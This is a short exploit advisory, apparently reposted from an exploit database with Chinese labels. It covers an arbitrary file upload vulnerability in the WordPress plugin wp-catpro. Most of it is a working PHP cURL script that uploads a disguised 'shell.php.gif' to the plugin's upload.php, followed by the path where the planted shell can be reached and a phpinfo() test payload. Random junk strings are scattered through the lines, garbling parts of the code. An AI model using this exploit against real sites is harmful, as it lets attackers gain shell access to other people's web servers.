WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
7 f( T2 f: s6 B3 k5 t" h) x3 ^邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
8 W( p$ y& U. Q" W6 g8 s+ r下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
' R+ f7 z8 ~- b+ y3 M9 D
#=> Exploit 信息:
6 B+ A2 r( S8 I% X9 q; C( k------------------
" J# h2 |1 r+ i5 z# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
$ s% |8 c; P' u& ~- o: I6 R8 n! [8 P# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
2 E$ f& s9 q. G6 M: b0 v# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
, Z$ ]( s! l6 w2 x. R6 x------------------

#=> Exploit
-----------
! `# {. H% a; G2 z# Z. O+ b/ _<?php
& }' ^6 e# k% H4 z  V( n; |( l
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" U# Y* T; k+ w/ u5 Jcurl_setopt($ch, CURLOPT_POST, true);
6 Q2 Q; Y0 S7 S; ccurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
; r9 J2 ^5 N4 Ncurl_close($ch);

% V- v' w2 {4 A. N% dprint "$postResult";
+ b% t7 r& W& R4 ^
, V- k7 T! `+ U7 H; S# R7 gShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
1 ?9 {4 m$ v, G* s<?php
phpinfo();
$ S, P+ |5 ?8 V4 H7 j$ T?>